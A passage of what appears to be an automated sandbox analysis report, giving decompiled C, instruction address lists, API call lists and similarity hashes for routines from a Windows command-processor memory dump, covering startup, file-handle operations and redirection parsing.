									_t28 =  *((intOrPtr*)( *_t19));
									_v36 = _t28;
									_push(_t19);
									_push(_t28);
									L4A5721EE();
									return _t19;
								}
							}
						}
					}
				}
				_t40 = 1;
				goto L3;
			}























                                0x4a55829f
                                0x4a5582a6
                                0x4a5582ad
                                0x4a5582b6
                                0x4a5582b9
                                0x4a5582c1
                                0x4a5582c4
                                0x4a5582cc
                                0x00000000
                                0x00000000
                                0x4a5583a4
                                0x4a5583a6
                                0x4a5583b8
                                0x00000000
                                0x4a5583a8
                                0x4a5583aa
                                0x4a5583ab
                                0x4a5583ab
                                0x4a5582d5
                                0x4a5582d5
                                0x4a5582dc
                                0x4a5583c5
                                0x4a5583ca
                                0x00000000
                                0x4a5582e2
                                0x4a5582e2
                                0x4a5582e9
                                0x4a558363
                                0x00000000
                                0x4a5582eb
                                0x4a5582eb
                                0x4a5582fb
                                0x4a558301
                                0x4a558304
                                0x4a5583d0
                                0x4a5583d7
                                0x00000000
                                0x4a55830a
                                0x4a55830a
                                0x4a55830a
                                0x4a558311
                                0x4a558313
                                0x4a55831d
                                0x4a558323
                                0x4a558324
                                0x4a558324
                                0x4a558331
                                0x4a558335
                                0x4a558335
                                0x4a55833b
                                0x4a558341
                                0x4a5583e6
                                0x4a5583eb
                                0x4a5583ec
                                0x4a5583ee
                                0x4a5583f8
                                0x4a5583f8
                                0x4a5583ee
                                0x4a558347
                                0x4a55834d
                                0x4a558353
                                0x4a558359
                                0x4a558406
                                0x4a55840b
                                0x4a558411
                                0x4a55844a
                                0x4a558450
                                0x4a558452
                                0x4a558452
                                0x4a558458
                                0x4a55845f
                                0x4a558464
                                0x4a558469
                                0x4a558413
                                0x4a558414
                                0x4a55841a
                                0x4a55841f
                                0x4a558421
                                0x4a558424
                                0x4a558425
                                0x4a558426
                                0x4a55842d
                                0x4a55842d
                                0x4a558411
                                0x4a558304
                                0x4a5582e9
                                0x4a5582dc
                                0x4a5582d4
                                0x00000000

                                APIs
                                • InterlockedCompareExchange.KERNEL32(4A574204,?,00000000), ref: 4A5582C4
                                • _initterm.MSVCRT ref: 4A55831D
                                • InterlockedExchange.KERNEL32(4A574204,00000000), ref: 4A558335
                                • exit.MSVCRT ref: 4A558414
                                • _XcptFilter.MSVCRT ref: 4A558426
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ExchangeInterlocked$CompareFilterXcpt_inittermexit
                                • String ID:
                                • API String ID: 1199863589-0
                                • Opcode ID: caa3cd9612efc35acc31ad0a2903e093fad97dbbb02ebeed02e225925611092c
                                • Instruction ID: d2d68f826a8a3c9edfad0cbf82f274a0df049f99cb299e0f1e19b7bd4c31e27d
                                • Opcode Fuzzy Hash: caa3cd9612efc35acc31ad0a2903e093fad97dbbb02ebeed02e225925611092c
                                • Instruction Fuzzy Hash: 7831A2F8901205DFE751AB65EF8491E3EB8BB45724F11482BF502FA67CDB745D00AB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56F46A, Relevance: 12.1, APIs: 8, Instructions: 95fileCOMMON
                                Download Yara Rule
                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A56F47C
                                • FlushFileBuffers.KERNEL32(00000000), ref: 4A56F480
                                  • Part of subcall function 4A553AB3: _close.MSVCRT ref: 4A553AED
                                • _get_osfhandle.MSVCRT ref: 4A56F4C6
                                • SetFilePointer.KERNEL32(00000000), ref: 4A56F4CA
                                • _get_osfhandle.MSVCRT ref: 4A56F4DC
                                • ReadFile.KERNEL32(00000000), ref: 4A56F4E0
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File_get_osfhandle$BuffersFlushPointerRead_close
                                • String ID:
                                • API String ID: 2203007708-0
                                • Opcode ID: 0655acc465c12f50adfa2739f61fe2daf97535cae0b54e5e8773dfd242e20dbc
                                • Instruction ID: 1f7d4f2c2b89306f66df34b97df96edfbe55072b8c4f0fc6ff5ca0cec87e62e5
                                • Opcode Fuzzy Hash: 0655acc465c12f50adfa2739f61fe2daf97535cae0b54e5e8773dfd242e20dbc
                                • Instruction Fuzzy Hash: BE21D071901115BBEF112FB1DE49F9A3FA9EF85370F100612F619DA0E8DA709C14CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A555C8C, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 310COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E4A555C8C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t88;
				signed int _t90;
				signed int _t93;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t124;
				signed int _t125;
				intOrPtr* _t126;
				signed int _t128;
				signed short* _t130;
				signed int _t131;
				signed int _t134;
				intOrPtr* _t135;
				long _t137;
				intOrPtr* _t138;
				signed int _t149;
				signed int _t152;
				signed int _t154;
				long _t156;
				void* _t161;
				void* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t177;
				signed int _t180;
				signed short* _t183;
				signed int _t186;
				void* _t187;
				void* _t188;
				intOrPtr* _t189;
				void* _t190;
				intOrPtr _t191;
				intOrPtr* _t193;
				intOrPtr* _t194;
				intOrPtr _t197;
				signed short* _t199;
				void* _t200;

				_push(0x8c);
				_push(0x4a555fa8);
				E4A5513E1(__ebx, __edi, __esi);
				_t156 =  *((intOrPtr*)(_t200 + 8));
				 *((intOrPtr*)(_t200 - 0x98)) = _t156;
				 *((intOrPtr*)(_t200 - 0x94)) =  *((intOrPtr*)(_t200 + 0xc));
				 *((intOrPtr*)(_t200 - 0x8c)) = 0x70;
				 *((intOrPtr*)(_t200 - 0x88)) = 5;
				_t193 = 0;
				 *(_t200 - 0x84) = 0;
				memset(_t200 - 0x80, 0, 0x64);
				 *((intOrPtr*)(_t200 - 0x90)) = 0;
				_t81 =  *0x4a5740b4; // 0x0
				 *((intOrPtr*)(_t81 + 0x30)) = 0;
				 *0x4a574080 = 0;
				 *((intOrPtr*)(_t200 - 4)) = 0;
				_t196 = 0x4a588640;
				 *(_t200 - 0x84) = 0x4a588640;
				if( *0x4a574081 != 0) {
					__eax =  *(__ebx + 0x38);
					__eflags =  *( *(__ebx + 0x38)) - 0x3a;
					if( *( *(__ebx + 0x38)) == 0x3a) {
						__eax =  *0x4a5740b4; // 0x0
						__eax =  *(__eax + 0x110);
						 *(__ebp - 0x84) = __eax;
					}
				}
				_t84 =  *0x4a574014(1, _t200 - 0x8c, _t200 - 0x90, L"SCRIPT");
				__eflags = _t84;
				if(_t84 == 0) {
					L44:
					 *((intOrPtr*)(_t200 - 4)) = 0xfffffffe;
					goto L4;
				} else {
					_t88 =  *0x4a5740b4; // 0x0
					_t90 =  *0x4a574010( *((intOrPtr*)(_t200 - 0x90)), _t193, _t88 + 0x30, 1, _t193);
					__eflags = _t90;
					if(_t90 == 0) {
						_t156 = GetLastError();
						_t196 = 0x4ec;
						__eflags = _t156 - 0x4ec;
						if(_t156 == 0x4ec) {
							L47:
							 *0x4a574004( *((intOrPtr*)(_t200 - 0x90)),  *((intOrPtr*)(_t200 - 0x94)), _t193);
							__eflags = _t156 - _t196;
							if(_t156 == _t196) {
								_push(_t193);
								_push(_t196);
								E4A556D44(_t157);
							}
							L49:
							_t93 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t93 + 0x30)) = _t193;
							 *0x4a57400c( *((intOrPtr*)(_t200 - 0x90)));
							goto L44;
						}
						__eflags = _t156 - 0x312;
						if(_t156 != 0x312) {
							goto L49;
						}
						goto L47;
					}
					 *0x4a57400c( *((intOrPtr*)(_t200 - 0x90)));
					_t97 =  *0x4a5740b4; // 0x0
					__eflags =  *((intOrPtr*)(_t97 + 0x30)) - _t193;
					if( *((intOrPtr*)(_t97 + 0x30)) != _t193) {
						_t98 =  *0x4a574008( *((intOrPtr*)(_t97 + 0x30)));
						__eflags = _t98;
						if(_t98 != 0) {
							goto L11;
						}
						_t152 =  *0x4a5740b4; // 0x0
						CloseHandle( *(_t152 + 0x30));
						_t154 =  *0x4a5740b4; // 0x0
						 *((intOrPtr*)(_t154 + 0x30)) = _t193;
						goto L44;
					}
					L11:
					 *((intOrPtr*)(_t200 - 4)) = 0xfffffffe;
					 *0x4a574080 = 1;
					_t99 =  *0x4a5740b4; // 0x0
					 *((intOrPtr*)(_t99 + 8)) = _t193;
					_t100 =  *0x4a5740b4; // 0x0
					 *_t100 =  *((intOrPtr*)(_t200 - 0x94));
					_t81 =  *(_t200 + 0x10);
					_t157 =  *0x4a5740b4; // 0x0
					 *(_t157 + 4) =  *(_t200 + 0x10);
					__eflags =  *0x4a574081;
					if( *0x4a574081 == 0) {
						goto L1;
					} else {
						_t157 =  *(_t156 + 0x38);
						__eflags =  *( *(_t156 + 0x38)) - 0x3a;
						if( *( *(_t156 + 0x38)) != 0x3a) {
							goto L1;
						}
						_t149 =  *0x4a5740b4; // 0x0
						_t194 =  *((intOrPtr*)(_t149 + 0x110));
						E4A55185A( *_t149,  *((intOrPtr*)(_t149 + 4)),  *_t194);
						_t186 =  *0x4a5740b4; // 0x0
						 *((intOrPtr*)(_t186 + 8)) =  *((intOrPtr*)(_t194 + 8));
						_t193 = 0;
						__eflags = 0;
						L15:
						E4A55185A(_t196, 0x2000,  *(_t156 + 0x38));
						_t104 = _t196;
						_t34 = _t104 + 2; // 0x4a588642
						_t161 = _t34;
						do {
							_t187 =  *_t104;
							_t104 = _t104 + 2;
							__eflags = _t187 - _t193;
						} while (_t187 != _t193);
						_t193 = 0x4a588642 + (_t104 - _t161 >> 1) * 2;
						 *_t193 = 0;
						_t109 =  *(_t156 + 0x3c);
						_t156 = 0;
						__eflags = _t109;
						if(_t109 != 0) {
							__eflags = 0x2000;
							E4A55185A(_t193, 0x2000 - (_t193 - _t196 >> 1), _t109);
						}
						_t110 =  *0x4a5740b4; // 0x0
						E4A551911( *((intOrPtr*)(_t110 + 0xc)));
						_t112 = _t196;
						_t39 = _t112 + 2; // 0x4a588642
						_t188 = _t39;
						do {
							_t162 =  *_t112;
							_t112 = _t112 + 2;
							__eflags = _t162 - _t156;
						} while (_t162 != _t156);
						_t163 =  *0x4a5740b4; // 0x0
						 *(_t163 + 0x64) = _t112 - _t188 >> 1;
						_t116 = E4A5519D6(_t196);
						_t164 =  *0x4a5740b4; // 0x0
						 *((intOrPtr*)(_t164 + 0x3c)) = _t116;
						_t117 =  *0x4a5740b4; // 0x0
						__eflags =  *((intOrPtr*)(_t117 + 0x3c)) - _t156;
						if( *((intOrPtr*)(_t117 + 0x3c)) == _t156) {
							L4:
							L41:
							return E4A5513CA(_t156, _t193, _t196);
						}
						 *((intOrPtr*)(_t117 + 0x8c)) =  *((intOrPtr*)(_t117 + 0x3c));
						_t118 = 0x68;
						do {
							_t166 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t118 + _t166 - 0x28)) = _t156;
							_t167 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t118 + _t167)) = _t156;
							_t118 = _t118 + 4;
							__eflags = _t118 - 0x8c;
						} while (_t118 < 0x8c);
						__eflags =  *_t193 - _t156;
						if( *_t193 == _t156) {
							_t119 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t119 + 0x38)) = _t156;
							_t120 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t120 + 0x34)) = _t156;
							L40:
							_t121 =  *0x4a5740b4; // 0x0
							_t168 =  *0x4a574104; // 0x0
							 *((intOrPtr*)(_t121 + 0x10)) = _t168;
							__eflags = 0;
							goto L41;
						}
						_t124 = E4A5519D6(_t193);
						_t171 =  *0x4a5740b4; // 0x0
						 *((intOrPtr*)(_t171 + 0x34)) = _t124;
						_t125 =  *0x4a5740b4; // 0x0
						_t189 =  *((intOrPtr*)(_t125 + 0x34));
						__eflags = _t189 - _t156;
						if(_t189 == _t156) {
							goto L4;
						}
						_t172 = _t189;
						_t126 = _t189;
						_t193 = _t126 + 2;
						do {
							_t196 =  *_t126;
							_t126 = _t126 + 2;
							__eflags = _t196 - _t156;
						} while (_t196 != _t156);
						_t128 = _t126 - _t193;
						__eflags = _t128;
						_t130 = _t172 + (_t128 >> 1) * 2;
						while(1) {
							__eflags = _t130 - _t189;
							if(_t130 == _t189) {
								break;
							}
							_t55 = _t130 - 2; // 0x38
							_t183 = _t55;
							_t196 =  *_t183 & 0x0000ffff;
							__eflags = _t196 - 0x20;
							if(_t196 == 0x20) {
								L5:
								_t130 = _t183;
								continue;
							}
							__eflags = _t196 - 9;
							if(_t196 == 9) {
								goto L5;
							}
							break;
						}
						 *_t130 = 0;
						__eflags =  *0x4a574081; // 0x0
						if(__eflags == 0) {
							_t131 =  *0x4a5740b4; // 0x0
							_push( *0x4a59065c & 0x0000ffff);
							_push( *((intOrPtr*)(_t131 + 0x34)));
							while(1) {
								_t196 = E4A5518EB();
								__eflags = _t196 - _t156;
								if(_t196 == _t156) {
									goto L33;
								}
								_t199 = _t196 + 2;
								_t137 = towupper( *_t199 & 0x0000ffff);
								__eflags = _t137 - 0x51;
								if(_t137 == 0x51) {
									 *0x4a57408c = _t156;
									_t75 = _t199 - 2; // 0x0
									_t182 = _t75;
									_t138 = _t75;
									_t76 = _t138 + 2; // 0x2
									_t193 = _t76;
									do {
										_t191 =  *_t138;
										_t138 = _t138 + 2;
										__eflags = _t191 - _t156;
									} while (_t191 != _t156);
									_t196 =  &(_t199[1]);
									E4A55185A(_t182, (_t138 - _t193 >> 1) + 1,  &(_t199[1]));
									goto L33;
								}
								_push( *0x4a59065c & 0x0000ffff);
								_push(_t199);
							}
						}
						L33:
						_t134 =  *0x4a5740b4; // 0x0
						_t135 = E4A5522CA( *((intOrPtr*)(_t134 + 0x34)), _t156, _t156);
						__eflags =  *_t135 - _t156;
						if( *_t135 == _t156) {
							L39:
							_t175 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t175 + 0x38)) = _t135;
							goto L40;
						}
						_t190 = 0x68;
						while(1) {
							__eflags = _t190 - 0x8c;
							if(_t190 >= 0x8c) {
								goto L39;
							}
							_t176 =  *0x4a5740b4; // 0x0
							 *((intOrPtr*)(_t190 + _t176 - 0x28)) = _t135;
							_t177 = _t135;
							_t59 = _t177 + 2; // 0x2
							_t193 = _t59;
							do {
								_t197 =  *_t177;
								_t177 = _t177 + 2;
								__eflags = _t197 - _t156;
							} while (_t197 != _t156);
							_t180 = _t177 - _t193 >> 1;
							_t196 =  *0x4a5740b4; // 0x0
							 *(_t190 + _t196) = _t180;
							_t135 = _t135 + 2 + _t180 * 2;
							_t190 = _t190 + 4;
							__eflags =  *_t135 - _t156;
							if( *_t135 != _t156) {
								continue;
							}
							goto L39;
						}
						goto L39;
					}
				}
				L1:
				_t101 =  *0x4a5740b4; // 0x0
				if(E4A552FAF(_t157,  *_t101, _t81, _t196) == 0) {
					goto L15;
				}
				goto L4;
			}





























































                                0x4a555c8c
                                0x4a555c91
                                0x4a555c96
                                0x4a555c9b
                                0x4a555c9e
                                0x4a555ca7
                                0x4a555cad
                                0x4a555cb7
                                0x4a555cc1
                                0x4a555cc3
                                0x4a555cd0
                                0x4a555cd8
                                0x4a555cde
                                0x4a555ce3
                                0x4a555ce6
                                0x4a555ced
                                0x4a555cf0
                                0x4a555cf5
                                0x4a555d02
                                0x4a555d04
                                0x4a555d07
                                0x4a555d0b
                                0x4a555d0d
                                0x4a555d12
                                0x4a555d1a
                                0x4a555d1a
                                0x4a555d0b
                                0x4a555d35
                                0x4a555d3b
                                0x4a555d3d
                                0x4a56458c
                                0x4a56458c
                                0x00000000
                                0x4a555d43
                                0x4a555d46
                                0x4a555d56
                                0x4a555d5c
                                0x4a555d5e
                                0x4a56459e
                                0x4a5645a0
                                0x4a5645a5
                                0x4a5645a7
                                0x4a5645b1
                                0x4a5645be
                                0x4a5645c4
                                0x4a5645c6
                                0x4a5645c8
                                0x4a5645c9
                                0x4a5645ca
                                0x4a5645d0
                                0x4a5645d1
                                0x4a5645d1
                                0x4a5645d6
                                0x4a5645df
                                0x00000000
                                0x4a5645df
                                0x4a5645a9
                                0x4a5645af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5645af
                                0x4a555d6a
                                0x4a555d70
                                0x4a555d75
                                0x4a555d78
                                0x4a564568
                                0x4a56456e
                                0x4a564570
                                0x00000000
                                0x00000000
                                0x4a564576
                                0x4a56457e
                                0x4a564584
                                0x4a564589
                                0x00000000
                                0x4a564589
                                0x4a555d7e
                                0x4a555d7e
                                0x4a555d85
                                0x4a555d8c
                                0x4a555d91
                                0x4a555d94
                                0x4a555d9f
                                0x4a555da1
                                0x4a555da4
                                0x4a555daa
                                0x4a555dad
                                0x4a555db4
                                0x00000000
                                0x4a555dba
                                0x4a555dba
                                0x4a555dbd
                                0x4a555dc1
                                0x00000000
                                0x00000000
                                0x4a555dc7
                                0x4a555dcc
                                0x4a555dd9
                                0x4a555de1
                                0x4a555de7
                                0x4a555dea
                                0x4a555dea
                                0x4a555dec
                                0x4a555df5
                                0x4a555dfa
                                0x4a555dfc
                                0x4a555dfc
                                0x4a555dff
                                0x4a555dff
                                0x4a555e03
                                0x4a555e04
                                0x4a555e04
                                0x4a555e0d
                                0x4a555e16
                                0x4a555e19
                                0x4a555e1c
                                0x4a555e1e
                                0x4a555e20
                                0x4a555e2e
                                0x4a555e32
                                0x4a555e32
                                0x4a555e37
                                0x4a555e3f
                                0x4a555e44
                                0x4a555e46
                                0x4a555e46
                                0x4a555e49
                                0x4a555e49
                                0x4a555e4d
                                0x4a555e4e
                                0x4a555e4e
                                0x4a555e57
                                0x4a555e5d
                                0x4a555e61
                                0x4a555e66
                                0x4a555e6c
                                0x4a555e6f
                                0x4a555e74
                                0x4a555e77
                                0x4a55564d
                                0x4a555f90
                                0x4a555f95
                                0x4a555f95
                                0x4a555e80
                                0x4a555e88
                                0x4a555e89
                                0x4a555e89
                                0x4a555e8f
                                0x4a555e93
                                0x4a555e99
                                0x4a555e9c
                                0x4a555e9f
                                0x4a555e9f
                                0x4a555ea6
                                0x4a555ea9
                                0x4a555638
                                0x4a55563d
                                0x4a555640
                                0x4a555645
                                0x4a555f80
                                0x4a555f80
                                0x4a555f85
                                0x4a555f8b
                                0x4a555f8e
                                0x00000000
                                0x4a555f8e
                                0x4a555ec1
                                0x4a555ec6
                                0x4a555ecc
                                0x4a555ecf
                                0x4a555ed4
                                0x4a555ed7
                                0x4a555ed9
                                0x00000000
                                0x00000000
                                0x4a555edf
                                0x4a555ee1
                                0x4a555ee3
                                0x4a555ee6
                                0x4a555ee6
                                0x4a555eea
                                0x4a555eeb
                                0x4a555eeb
                                0x4a555ef0
                                0x4a555ef0
                                0x4a555ef4
                                0x4a555ef7
                                0x4a555ef7
                                0x4a555ef9
                                0x00000000
                                0x00000000
                                0x4a555efb
                                0x4a555efb
                                0x4a555efe
                                0x4a555f01
                                0x4a555f05
                                0x4a555850
                                0x4a555850
                                0x00000000
                                0x4a555850
                                0x4a555f0b
                                0x4a555f0f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555f0f
                                0x4a555f17
                                0x4a555f1a
                                0x4a555f20
                                0x4a564631
                                0x4a564640
                                0x4a564641
                                0x4a564660
                                0x4a564665
                                0x4a564667
                                0x4a564669
                                0x00000000
                                0x00000000
                                0x4a564645
                                0x4a56464a
                                0x4a564651
                                0x4a564655
                                0x4a564671
                                0x4a564677
                                0x4a564677
                                0x4a56467a
                                0x4a56467c
                                0x4a56467c
                                0x4a56467f
                                0x4a56467f
                                0x4a564683
                                0x4a564684
                                0x4a564684
                                0x4a56468d
                                0x4a564694
                                0x00000000
                                0x4a564694
                                0x4a56465e
                                0x4a56465f
                                0x4a56465f
                                0x4a564660
                                0x4a555f26
                                0x4a555f28
                                0x4a555f30
                                0x4a555f35
                                0x4a555f38
                                0x4a555f77
                                0x4a555f77
                                0x4a555f7d
                                0x00000000
                                0x4a555f7d
                                0x4a555f3c
                                0x4a555f3d
                                0x4a555f3d
                                0x4a555f43
                                0x00000000
                                0x00000000
                                0x4a555f45
                                0x4a555f4b
                                0x4a555f4f
                                0x4a555f51
                                0x4a555f51
                                0x4a555f54
                                0x4a555f54
                                0x4a555f58
                                0x4a555f59
                                0x4a555f59
                                0x4a555f60
                                0x4a555f62
                                0x4a555f68
                                0x4a555f6b
                                0x4a555f6f
                                0x4a555f72
                                0x4a555f75
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555f75
                                0x00000000
                                0x4a555f3d
                                0x4a555db4
                                0x4a5555c8
                                0x4a5555ca
                                0x4a5555d8
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetwcsspn
                                • String ID: SCRIPT
                                • API String ID: 3809306610-3967369404
                                • Opcode ID: 8499763e2197e46dee873fe8d3e7da4a045a058fe8ccb34c617923ce8db09e35
                                • Instruction ID: 1234676b84dfc947eee3a688e9e6484b2472ed2a3fedcf715ce39c02b2ce798c
                                • Opcode Fuzzy Hash: 8499763e2197e46dee873fe8d3e7da4a045a058fe8ccb34c617923ce8db09e35
                                • Instruction Fuzzy Hash: 0FC159B9511100DFD715DF64CB84A697BFAFF4A300F42409AE90AEFA69DB30AE41CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5547C7, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 229COMMON
                                Download Yara Rule
                                C-Code - Quality: 44%
                                			E4A5547C7(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v528;
				intOrPtr* _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				intOrPtr* _t39;
				void* _t40;
				void* _t42;
				WCHAR* _t43;
				void* _t54;
				WCHAR* _t60;
				void* _t63;
				signed int _t65;
				void* _t70;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t77;
				intOrPtr* _t79;
				signed int _t83;
				short* _t84;
				signed int _t85;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr* _t96;
				void* _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				signed int _t102;

				_t37 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t37 ^ _t102;
				_t85 = _a4;
				_t100 =  *((intOrPtr*)(_t85 + 0x34));
				while(_t100 != 0) {
					_t93 =  *((intOrPtr*)(_t100 + 4));
					_t73 =  *((intOrPtr*)(_t100 + 4));
					_t98 = _t73 + 2;
					do {
						_t96 =  *_t73;
						_t73 = _t73 + 2;
					} while (_t96 != 0);
					_t77 = E4A552598(_t93, _t93);
					_t97 = (_t73 - _t98 >> 1) + 1;
					E4A55185A( *((intOrPtr*)(_t100 + 4)), (_t73 - _t98 >> 1) + 1, _t77);
					if( *((intOrPtr*)(_t100 + 8)) != 0) {
						L9:
						_t100 =  *((intOrPtr*)(_t100 + 0x14));
						continue;
					}
					_t96 =  *((intOrPtr*)(_t100 + 4));
					_t79 = _t96;
					_t97 = _t79 + 2;
					do {
						_t94 =  *_t79;
						_t79 = _t79 + 2;
					} while (_t94 != 0);
					_t83 = (_t79 - _t97 >> 1) - 1;
					if(_t83 > 1) {
						_t84 = _t96 + _t83 * 2;
						if( *_t84 == 0x3a) {
							 *_t84 = 0;
						}
					}
					goto L9;
				}
				_t101 = _a8;
				if(_t101 == 3) {
					_t39 =  *0x4a5740fc; // 0x0
					_v532 = _t39;
					L13:
					_t101 =  *((intOrPtr*)(_t85 + 0x34));
					if(_t101 == 0) {
						L29:
						_t40 = 0;
						L30:
						return E4A5513A9(_t40, _t85, _v8 ^ _t102, _t96, _t97, _t101);
					}
					_t85 = _t85 | 0xffffffff;
					do {
						if( *(_t101 + 8) != 0) {
							goto L28;
						}
						_t97 = __imp___get_osfhandle;
						_t42 =  *_t97( *_t101);
						_pop(_t88);
						if(_t42 == _t85) {
							L38:
							 *(_t101 + 8) = _t85;
							L21:
							_t43 =  *(_t101 + 4);
							if( *_t43 == 0x26) {
								_t88 = 0;
								_t43[2] = 0;
								if(E4A5546D3((( *(_t101 + 4))[1] & 0x0000ffff) - 0x30, (( *(_t101 + 4))[1] & 0x0000ffff) - 0x30,  *_t101) != _t85) {
									goto L28;
								}
								L41:
								E4A554738();
								E4A556D44(_t88, 0x2344, 1, E4A559A2C(E4A555104,  *_t101));
								L37:
								_t40 = 1;
								goto L30;
							}
							if( *((short*)(_t101 + 0x10)) == 0x3c) {
								_t97 = E4A5539EF(_t43, 0x8000);
								if(_t97 != _t85) {
									L25:
									_t53 =  *_t101;
									if(_t97 !=  *_t101) {
										_t54 = E4A5546D3(_t53, _t97, _t53);
										_push(_t97);
										if(_t54 == _t85) {
											E4A553AB3();
											goto L41;
										}
										E4A553AB3();
										_t97 =  *_t101;
									}
									if(_t97 == _t85) {
										L36:
										E4A554738();
										E4A56056B( *0x4a574128);
										goto L37;
									}
									 *((intOrPtr*)(_v532 + 4)) = _t97;
									goto L28;
								}
								_t60 = E4A55321B(_t88, L"DPATH");
								if(_t60 == 0) {
									goto L36;
								}
								_t88 =  &_v528;
								if(SearchPathW(_t60,  *(_t101 + 4), 0, 0x104,  &_v528, 0) == 0) {
									goto L36;
								}
								_push(0x8000);
								_t43 =  &_v528;
								L24:
								_push(_t43);
								_t97 = E4A5539EF();
								if(_t97 == _t85) {
									goto L36;
								}
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t88 = ( ~( *(_t101 + 0xc)) & 0xfffffe09) + 0x301;
							_push(( ~( *(_t101 + 0xc)) & 0xfffffe09) + 0x301);
							goto L24;
						}
						_t63 =  *_t97( *_t101);
						_pop(_t88);
						if(_t63 == 0xfffffffe) {
							goto L38;
						}
						if(E4A553B03(_t63, _t88,  *_t101) == 0) {
							_t64 = E4A556BEA(_t64,  *_t101);
							if(_t64 != 0) {
								goto L19;
							}
							_t70 =  *_t97( *_t101, _t64, _t64, 1);
							_pop(_t88);
							if(SetFilePointer(_t70, ??, ??, ??) != _t85) {
								goto L19;
							}
							_push(E4A559A2C(E4A555104,  *_t101));
							_push(1);
							_push(0x40002721);
							L50:
							E4A556D44(_t88);
							 *(_t101 + 8) =  *(_t101 + 8) & 0x00000000;
							E4A554738();
							goto L37;
						}
						L19:
						_t65 = E4A554794(_t64,  *_t101);
						_push( *_t101);
						 *(_t101 + 8) = _t65;
						if(_t65 == _t85) {
							_push(E4A555104);
							_push(E4A559A2C());
							_push(1);
							_push(0x2344);
							goto L50;
						}
						E4A553AB3();
						goto L21;
						L28:
						_t101 =  *((intOrPtr*)(_t101 + 0x14));
					} while (_t101 != 0);
					goto L29;
				}
				_t72 = E4A551896(0x10);
				_v532 = _t72;
				if(_t72 == 0) {
					goto L37;
				}
				_t92 =  *0x4a5740fc; // 0x0
				 *((intOrPtr*)(_t72 + 0xc)) = _t92;
				 *0x4a5740fc = _t72;
				 *(_t72 + 8) = _t85;
				 *_t72 = _t101;
				goto L13;
			}

































                                0x4a5547d2
                                0x4a5547d9
                                0x4a5547dd
                                0x4a5547e1
                                0x4a5547e5
                                0x4a5547e9
                                0x4a5547ec
                                0x4a5547ee
                                0x4a5547f1
                                0x4a5547f1
                                0x4a5547f5
                                0x4a5547f6
                                0x4a554802
                                0x4a554808
                                0x4a55480d
                                0x4a554816
                                0x4a554841
                                0x4a554841
                                0x00000000
                                0x4a554841
                                0x4a554818
                                0x4a55481b
                                0x4a55481d
                                0x4a554820
                                0x4a554820
                                0x4a554824
                                0x4a554825
                                0x4a55482e
                                0x4a554832
                                0x4a554834
                                0x4a55483b
                                0x4a567046
                                0x4a567046
                                0x4a55483b
                                0x00000000
                                0x4a554832
                                0x4a554846
                                0x4a55484c
                                0x4a56704e
                                0x4a567053
                                0x4a55487a
                                0x4a55487a
                                0x4a55487f
                                0x4a55493d
                                0x4a55493d
                                0x4a55493f
                                0x4a55494d
                                0x4a55494d
                                0x4a554885
                                0x4a554888
                                0x4a55488c
                                0x00000000
                                0x00000000
                                0x4a554894
                                0x4a55489a
                                0x4a55489c
                                0x4a55489f
                                0x4a5605ca
                                0x4a5605ca
                                0x4a5548db
                                0x4a5548db
                                0x4a5548e2
                                0x4a55641d
                                0x4a55641f
                                0x4a556437
                                0x00000000
                                0x00000000
                                0x4a56705e
                                0x4a56705e
                                0x4a567077
                                0x4a5605c2
                                0x4a5605c4
                                0x00000000
                                0x4a5605c4
                                0x4a5548ed
                                0x4a56708f
                                0x4a567093
                                0x4a554917
                                0x4a554917
                                0x4a55491b
                                0x4a5670df
                                0x4a5670e4
                                0x4a5670e7
                                0x4a567133
                                0x00000000
                                0x4a567133
                                0x4a5670e9
                                0x4a5670ee
                                0x4a5670ee
                                0x4a554923
                                0x4a5605b2
                                0x4a5605b2
                                0x4a5605bd
                                0x00000000
                                0x4a5605bd
                                0x4a55492f
                                0x00000000
                                0x4a55492f
                                0x4a56709e
                                0x4a5670a5
                                0x00000000
                                0x00000000
